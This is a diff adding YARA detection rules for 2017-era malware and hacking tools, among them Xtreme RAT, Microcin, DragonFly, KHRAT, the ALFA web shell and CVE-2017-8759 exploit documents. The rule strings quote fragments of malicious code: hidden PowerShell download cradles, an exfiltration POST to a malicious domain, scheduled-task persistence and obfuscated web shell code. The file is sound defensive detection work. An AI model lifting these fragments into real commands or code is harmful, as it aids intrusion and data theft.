+      $x2 = ".Run\"powershell.exe -nop -w hidden -c \"\"IEX " ascii
+      $s1 = "window.resizeTo 0,0" fullword ascii
+   condition: 
+      ( filesize < 2KB and 1 of them )
+}
+
+rule Susp_PowerShell_Sep17_2_RID2FA0 : ANOMALY DEMO FILE SCRIPT SUSP T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects suspicious PowerShell script in combo with VBS or JS "
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-09-30 12:05:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e387f6c7a55b85e0675e3b91e41e5814f5d0ae740b92f26ddabda6d4f69a8ca8"
+      tags = "ANOMALY, DEMO, FILE, SCRIPT, SUSP, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ".Run \"powershell.exe -nop -w hidden -e " ascii
+      $x2 = "FileExists(path + \"\\..\\powershell.exe\")" fullword ascii
+      $x3 = "window.moveTo -4000, -4000" fullword ascii
+      $s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
+   condition: 
+      filesize < 20KB and ( ( uint16 ( 0 ) == 0x733c and 1 of ( $x* ) ) or 2 of them )
+}
+
+rule Xtreme_Sep17_3_RID2C07 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects XTREME sample analyzed in September 2017"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-09-27 09:31:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f540a4cac716438da0c1c7b31661abf35136ea69b963e8f16846b96f8fd63dde"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "Keylogg" fullword ascii
+      $s4 = "XTREME" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 700KB and all of them )
+}
+
+rule Xtreme_Sep17_2_RID2C06 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects XTREME sample analyzed in September 2017"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-09-27 09:31:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f8413827c52a5b073bdff657d6a277fdbfda29d909b4247982f6973424fa2dcc"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Spy24.exe" fullword wide
+      $s2 = "Remote Service Application" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and all of them )
+}
+
+rule Xtreme_RAT_Gen_Imp_RID2DCA : DEMO EXE FILE GEN MAL {
+   meta:
+      description = "Detects XTREME sample analyzed in September 2017"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-09-27 10:46:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7b5082bcc8487bb65c38e34c192c2a891e7bb86ba97281352b0837debee6f1cf"
+      tags = "DEMO, EXE, FILE, GEN, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "d0bdf112886f3d846cc7780967d8efb9" or pe.imphash ( ) == "cc6f630f214cf890e63e899d8ebabba6" or pe.imphash ( ) == "e0f7991d50ceee521d7190effa3c494e" )
+}
+
+rule Microcin_Sample_2_RID2D97 : DEMO EXE FILE MAL {
+   meta:
+      description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+      author = "Florian Roth"
+      reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+      date = "2017-09-26 10:38:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8a7d04229722539f2480270851184d75b26c375a77b468d8cbad6dbdb0c99271"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "[Pause]" fullword ascii
+      $s7 = "IconCache_%02d%02d%02d%02d%02d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule Microcin_Sample_3_RID2D98 : DEMO EXE FILE MAL {
+   meta:
+      description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+      author = "Florian Roth"
+      reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+      date = "2017-09-26 10:38:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4f74a3b67c5ed6f38f08786f1601214412249fe128f12c51525135710d681e1d"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "C:\\Users\\Lenovo\\Desktop\\test\\Release\\test.pdb" fullword ascii
+      $s2 = "test, Version 1.0" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule Microcin_Sample_4_RID2D99 : DEMO EXE FILE MAL {
+   meta:
+      description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+      author = "Florian Roth"
+      reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+      date = "2017-09-26 10:38:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "92c01d5af922bdaacb6b0b2dfbe29e5cc58c45cbee5133932a499561dab616b8"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "cmd /c dir /a /s \"%s\" > \"%s\"" fullword wide
+      $s2 = "ini.dat" fullword wide
+      $s3 = "winupdata" fullword wide
+      $f1 = "%s\\(%08x%08x)%s" fullword wide
+      $f2 = "%s\\d%08x\\d%08x.db" fullword wide
+      $f3 = "%s\\u%08x\\u%08x.db" fullword wide
+      $f4 = "%s\\h%08x\\h%08x.db" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of ( $s* ) or 5 of them )
+}
+
+rule Microcin_Sample_5_RID2D9A : DEMO EXE MAL {
+   meta:
+      description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+      author = "Florian Roth"
+      reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+      date = "2017-09-26 10:38:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b9c51397e79d5a5fd37647bc4e4ee63018ac3ab9d050b02190403eb717b1366e"
+      tags = "DEMO, EXE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Sorry, you are not fortuante ^_^, Please try other password dictionary " fullword ascii
+      $x2 = "DomCrack <IP> <UserName> <Password_Dic file path> <option>" fullword ascii
+      $x3 = "The password is \"%s\"         Time: %d(s)" fullword ascii
+      $x4 = "The password is \" %s \"         Time: %d(s)" fullword ascii
+      $x5 = "No password found!" fullword ascii
+      $x7 = "Can not found the Password Dictoonary file! " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them ) or 2 of them
+}
+
+rule Microcin_Sample_6_RID2D9B : DEMO EXE FILE MAL {
+   meta:
+      description = "Malware sample mentioned in Microcin technical report by Kaspersky"
+      author = "Florian Roth"
+      reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
+      date = "2017-09-26 10:39:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cbd43e70dc55e94140099722d7b91b07a3997722d4a539ecc4015f37ea14a26e"
+      hash2 = "871ab24fd6ae15783dd9df5010d794b6121c4316b11f30a55f23ba37eef4b87a"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "** ERROR ** %s: %s" fullword ascii
+      $s2 = "TEMPDATA" fullword wide
+      $s3 = "Bruntime error " fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and all of them )
+}
+
+rule Sharpire_RID2A4F : DEMO EXE FILE HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule - file Sharpire_RID2A4F.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/0xbadjuju/Sharpire_RID2A4F"
+      date = "2017-09-23 05:03:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "327a1dc2876cd9d7f6a5b3777373087296fc809d466e42861adcf09986c6e587"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\obj\\Debug\\Sharpire_RID2A4F.pdb" ascii
+      $x2 = "[*] Upload of $fileName successful" fullword wide
+      $s1 = "no shell command supplied" fullword wide
+      $s2 = "/login/process.php" fullword wide
+      $s3 = "invokeShellCommand" fullword ascii
+      $s4 = "..Command execution completed." fullword wide
+      $s5 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword wide
+      $s6 = "/admin/get.php" fullword wide
+      $s7 = "[!] Error in stopping job: " fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) and 3 of them ) )
+}
+
+rule Invoke_Metasploit_RID2DFE : DEMO HKTL METASPLOIT T1105 {
+   meta:
+      description = "Detects Invoke-Metasploit Payload"
+      author = "Florian Roth"
+      reference = "https://github.com/jaredhaight/Invoke-MetasploitPayload/blob/master/Invoke-MetasploitPayload.ps1"
+      date = "2017-09-23 10:55:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b36d3ca7073741c8a48c578edaa6d3b6a8c3c4413e961a83ad08ad128b843e0b"
+      tags = "DEMO, HKTL, METASPLOIT, T1105"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[*] Looks like we're 64bit, using regular powershell.exe" ascii wide
+      $s2 = "[*] Kicking off download cradle in a new process" 
+      $s3 = "Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+''');'" 
+   condition: 
+      ( filesize < 20KB and 1 of them )
+}
+
+rule ALFA_SHELL_RID29FC : APT DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects web shell often used by Iranian APT groups"
+      author = "Florian Roth"
+      reference = "http://getalfa.rf.gd/?i=1"
+      date = "2017-09-21 02:45:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a39d8823d54c55e60a7395772e50d116408804c1a5368391a1e5871dbdc83547"
+      tags = "APT, DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64')" ascii
+      $x2 = "#solevisible@gmail.com" fullword ascii
+      $x3 = "'login_page' => '500',//gui or 500 or 403 or 404" fullword ascii
+      $x4 = "$GLOBALS['__ALFA__']" fullword ascii
+      $x5 = "if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')" ascii
+      $f1 = { 76 2F 38 76 2F 36 76 2F 2B 76 2F 2F 66 38 46 27 29 3B 3F 3E 0D 0A } 
+   condition: 
+      ( filesize < 900KB and 2 of ( $x* ) or $f1 at ( filesize - 22 ) )
+}
+
+rule CVE_2017_8759_SOAP_Excel_RID2E36 : CVE_2017_8759 DEMO EXPLOIT MAL OFFICE T1193 T1203 {
+   meta:
+      description = "Detects malicious files related to CVE-2017-8759"
+      author = "Florian Roth"
+      reference = "https://twitter.com/buffaloverflow/status/908455053345869825"
+      date = "2017-09-15 11:04:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2017_8759, DEMO, EXPLOIT, MAL, OFFICE, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "|'soap:wsdl=" ascii wide nocase
+   condition: 
+      ( filesize < 300KB and 1 of them )
+}
+
+rule CVE_2017_8759_Mal_HTA_RID2D09 : CVE_2017_8759 DEMO EXPLOIT FILE MAL T1193 T1203 {
+   meta:
+      description = "Detects malicious files related to CVE-2017-8759 - file cmd.hta"
+      author = "Florian Roth"
+      reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
+      date = "2017-09-14 10:14:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fee2ab286eb542c08fdfef29fabf7796a0a91083a0ee29ebae219168528294b5"
+      tags = "CVE_2017_8759, DEMO, EXPLOIT, FILE, MAL, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Error = Process.Create(\"powershell -nop cmd.exe /c" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x683c and filesize < 1KB and all of them )
+}
+
+rule CVE_2017_8759_Mal_Doc_RID2D42 : CVE_2017_8759 DEMO EXPLOIT FILE MAL T1193 T1203 {
+   meta:
+      description = "Detects malicious files related to CVE-2017-8759 - file Doc1.doc"
+      author = "Florian Roth"
+      reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
+      date = "2017-09-14 10:24:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6314c5696af4c4b24c3a92b0e92a064aaf04fd56673e830f4d339b8805cc9635"
+      tags = "CVE_2017_8759, DEMO, EXPLOIT, FILE, MAL, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "soap:wsdl=http://" ascii wide nocase
+      $s2 = "soap:wsdl=https://" ascii wide nocase
+      $s3 = "soap:wsdl=http%3A%2F%2F" ascii wide nocase
+      $s4 = "soap:wsdl=https%3A%2F%2F" ascii wide nocase
+      $c1 = "Project.ThisDocument.AutoOpen" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0xcfd0 and filesize < 500KB and ( 1 of ( $s* ) and $c1 )
+}
+
+rule CVE_2017_8759_SOAP_via_JS_RID2E81 : CVE_2017_8759 DEMO EXPLOIT {
+   meta:
+      description = "Detects SOAP WDSL Download via JavaScript"
+      author = "Florian Roth"
+      reference = "https://twitter.com/buffaloverflow/status/907728364278087680"
+      date = "2017-09-14 11:17:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2017_8759, DEMO, EXPLOIT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GetObject(\"soap:wsdl=https://" ascii wide nocase
+      $s2 = "GetObject(\"soap:wsdl=http://" ascii wide nocase
+   condition: 
+      ( filesize < 3KB and 1 of them )
+}
+
+rule CVE_2017_8759_SOAP_txt_RID2DA5 : CVE_2017_8759 DEMO EXPLOIT MAL T1193 T1203 {
+   meta:
+      description = "Detects malicious file in releation with CVE-2017-8759 - file exploit.txt"
+      author = "Florian Roth"
+      reference = "https://github.com/Voulnet/CVE-2017-8759-Exploit-sample"
+      date = "2017-09-14 10:40:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "840ad14e29144be06722aff4cc04b377364eeed0a82b49cc30712823838e2444"
+      tags = "CVE_2017_8759, DEMO, EXPLOIT, MAL, T1193, T1203"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $s1 = /<soap:address location="http[s]?:\/\/[^"]{8,140}.hta"/ ascii wide
+      $s2 = /<soap:address location="http[s]?:\/\/[^"]{8,140}mshta.exe"/ ascii wide
+   condition: 
+      ( filesize < 200KB and 1 of them )
+}
+
+rule Unspecified_Malware_Sep1_A1_RID3131 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from DrqgonFly APT report"
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+      date = "2017-09-12 13:12:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and pe.imphash ( ) == "17a4bd9c95f2898add97f309fc6f9bcd" )
+}
+
+rule DragonFly_APT_Sep17_3_RID2E5C : APT DEMO EXE FILE G0035 MAL {
+   meta:
+      description = "Detects malware from DrqgonFly APT report"
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+      date = "2017-09-12 11:11:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b051a5997267a5d7fa8316005124f3506574807ab2b25b037086e2e971564291"
+      tags = "APT, DEMO, EXE, FILE, G0035, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "kernel64.dll" fullword ascii
+      $s2 = "ws2_32.dQH" fullword ascii
+      $s3 = "HGFEDCBADCBA" fullword ascii
+      $s4 = "AWAVAUATWVSU" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 40KB and ( pe.imphash ( ) == "6f03fb864ff388bac8680ac5303584be" or all of them ) )
+}
+
+rule DragonFly_APT_Sep17_4_RID2E5D : APT DEMO EXE FILE G0035 MAL {
+   meta:
+      description = "Detects malware from DrqgonFly APT report"
+      author = "Florian Roth"
+      reference = "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
+      date = "2017-09-12 11:11:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
+      tags = "APT, DEMO, EXE, FILE, G0035, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "screen.exe" fullword wide
+      $s2 = "PlatformInvokeUSER32" fullword ascii
+      $s3 = "GetDesktopImageF" fullword ascii
+      $s4 = "PlatformInvokeGDI32" fullword ascii
+      $s5 = "GetDesktopImage" fullword ascii
+      $s6 = "Too many arguments, going to store in current dir" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 60KB and all of them )
+}
+
+rule WScriptShell_Case_Anomaly_RID30E0 : ANOMALY DEMO OBFUS SCRIPT SUSP T1064 {
+   meta:
+      description = "Detects obfuscated wscript.shell commands"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-09-11 12:58:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-06-09"
+      tags = "ANOMALY, DEMO, OBFUS, SCRIPT, SUSP, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "WScript.Shell\").Run" nocase ascii wide
+      $sn1 = "WScript.Shell\").Run" ascii wide
+      $sn2 = "wscript.shell\").run" ascii wide
+      $sn3 = "WSCRIPT.SHELL\").RUN" ascii wide
+      $sn4 = "Wscript.Shell\").Run" ascii wide
+      $sn5 = "WScript.shell\").Run" ascii wide
+   condition: 
+      filesize < 3000KB and #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5
+}
+
+rule Monsoon_APT_Malware_1_RID2EF6 : APT DEMO EXE FILE G0040 G0042 MAL {
+   meta:
+      description = "Detects malware from Monsoon APT"
+      author = "Florian Roth"
+      reference = "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
+      date = "2017-09-08 11:36:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "c9642f44d33e4c990066ce6fa0b0956ff5ace6534b64160004df31b9b690c9cd"
+      tags = "APT, DEMO, EXE, FILE, G0040, G0042, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "cmd.exe /c start " fullword ascii
+      $s2 = "\\Microsoft\\Templates\\" ascii
+      $s3 = "\\Microsoft\\Windows\\" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a0c824244f1d36ea1dd2759cf7599cd1" or all of them ) )
+}
+
+rule Rehashed_RAT_2_RID2C0C : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Rehashed RAT incident"
+      author = "Florian Roth"
+      reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
+      date = "2017-09-08 09:32:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "49efab1dedc6fffe5a8f980688a5ebefce1be3d0d180d5dd035f02ce396c9966"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "dalat.dulichovietnam.net" fullword ascii
+      $x2 = "web.Thoitietvietnam.org" fullword ascii
+      $a1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)" fullword ascii
+      $a2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
+      $s1 = "GET /%s%s%s%s HTTP/1.1" fullword ascii
+      $s2 = "http://%s:%d/%s%s%s%s" fullword ascii
+      $s3 = "{521338B8-3378-58F7-AFB9-E7D35E683BF8}" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "9c4c648f4a758cbbfe28c8850d82f931" or ( 1 of ( $x* ) or 3 of them ) ) ) or ( 4 of them )
+}
+
+rule Rehashed_RAT_3_RID2C0D : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware from Rehashed RAT incident"
+      author = "Florian Roth"
+      reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
+      date = "2017-09-08 09:32:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "9cebae97a067cd7c2be50d7fd8afe5e9cf935c11914a1ab5ff59e91c1e7e5fc4"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\BisonNewHNStubDll\\Release\\Goopdate.pdb" ascii
+      $s2 = "psisrndrx.ebd" fullword wide
+      $s3 = "pbad exception" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them )
+}
+
+rule KHRAT_Malware_RID2BB3 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects an Imphash of KHRAT malware"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+      date = "2017-08-31 09:17:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "53e27fd13f26462a58fa5587ecd244cab4da23aa80cf0ed6eb5ee9f9de2688c1"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "6a8478ad861f98f8428a042f74de1944"
+}
+
+rule MAL_KHRAT_script_RID2CB8 : DEMO MAL SCRIPT T1053 T1085 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file MAL_KHRAT_scritpt.js"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+      date = "2017-08-31 10:01:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8c88b4177b59f4cac820b0019bcc7f6d3d50ce4badb689759ab0966780ae32e3"
+      tags = "DEMO, MAL, SCRIPT, T1053, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "CreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn" ascii
+      $x2 = "CreateObject(\"WScript.Shell\").Run \"rundll32.exe javascript:\"\"\\..\\mshtml,RunHTMLApplication" ascii
+      $x3 = "<registration progid=\"ff010f\" classid=\"{e934870c-b429-4d0d-acf1-eef338b92c4b}\" >" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule MAL_KHRAT_scritplet_RID2DFD : DEMO FILE MAL {
+   meta:
+      description = "Semiautomatically generated YARA rule - file MAL_KHRAT_scritplet_RID2DFD.sct"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
+      date = "2017-08-31 10:55:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cdb9104636a6f7c6018fe99bc18fb8b542689a84c23c10e9ea13d5aa275fd40e"
+      tags = "DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "http.open \"POST\", \"http://update.upload-dropbox[.]com/docs/tz/GetProcess.php\",False,\"\",\"\" " fullword ascii
+      $x2 = "Process=Process & Chr(32) & Chr(32) & Chr(32) & Obj.Description" fullword ascii
+      $s1 = "http.SetRequestHeader \"Content-Type\", \"application/json\" " fullword ascii
+      $s2 = "Dim http,WMI,Objs,Process" fullword ascii
+      $s3 = "Set Objs=WMI.InstancesOf(\"Win32_Process\")" fullword ascii
+      $s4 = "'WScript.Echo http.responseText " fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x3f3c and filesize < 1KB and ( 1 of ( $x* ) or 4 of them )
+}
+
+rule APT12_Malware_Aug17_RID2D65 : APT DEMO EXE FILE G0005 MAL {
+   meta:
+      description = "Detects APT 12 Malware"
+      author = "Florian Roth"
+      reference = "http://blog.macnica.net/blog/2017/08/post-fb81.html"
+      date = "2017-08-30 10:30:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dc7521c00ec2534cf494c0263ddf67ea4ba9915eb17bdc0b3ebe9e840ec63643"
+      hash2 = "42da51b69bd6625244921a4eef9a2a10153e012a3213e8e9877cf831aea3eced"
+      tags = "APT, DEMO, EXE, FILE, G0005, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and pe.imphash ( ) == "9ba915fd04f248ad62e856c7238c0264" )
+}
+
+rule KeeThief_PS_RID2B18 : DEMO FILE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects component of KeeTheft - KeePass dump tool - file KeeThief.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/HarmJ0y/KeeThief"
+      date = "2017-08-29 08:51:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a3b976279ded8e64b548c1d487212b46b03aaec02cb6e199ea620bd04b8de42f"
+      tags = "DEMO, FILE, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "$WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\"" fullword ascii
+      $x2 = "if($KeePassProcess.FileVersion -match '^2\\.') {" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7223 and filesize < 1000KB and ( 1 of ( $x* ) ) )
+}
+
+rule KeeTheft_EXE_RID2B62 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects component of KeeTheft - KeePass dump tool - file KeeTheft.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/HarmJ0y/KeeThief"
+      date = "2017-08-29 09:04:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f06789c3e9fe93c165889799608e59dda6b10331b931601c2b5ae06ede41dc22"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Error: Could not create a thread for the shellcode" fullword wide
+      $x2 = "Could not find address marker in shellcode" fullword wide
+      $x3 = "GenerateDecryptionShellCode" fullword ascii
+      $x4 = "KeePassLib.Keys.KcpPassword" fullword wide
+      $x5 = "************ Found a CompositeKey! **********" fullword wide
+      $x6 = "*** Interesting... there are multiple .NET runtimes loaded in KeePass" fullword wide
+      $x7 = "GetKcpPasswordInfo" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+}
+
